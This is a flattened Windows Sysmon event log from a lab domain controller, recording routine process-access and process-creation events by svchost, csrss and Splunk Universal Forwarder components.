13:56:48.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.027{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-93A0-6005-DB04-00000000A301}1156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.027{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-93A0-6005-DB04-00000000A301}1156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.027{59A5CD1D-93A0-6005-DB04-00000000A301}1156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:49.871{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-93A1-6005-DD04-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:49.871{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:49.871{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:49.871{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:49.871{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:49.871{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:49.871{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:49.871{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:49.871{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:49.871{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:49.871{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-93A1-6005-DD04-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:49.871{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-93A1-6005-DD04-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:49.871{59A5CD1D-93A1-6005-DD04-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:44.541{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-93D8-6005-DE04-00000000A301}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:44.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:44.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:44.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:44.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:44.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:44.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:44.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:44.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 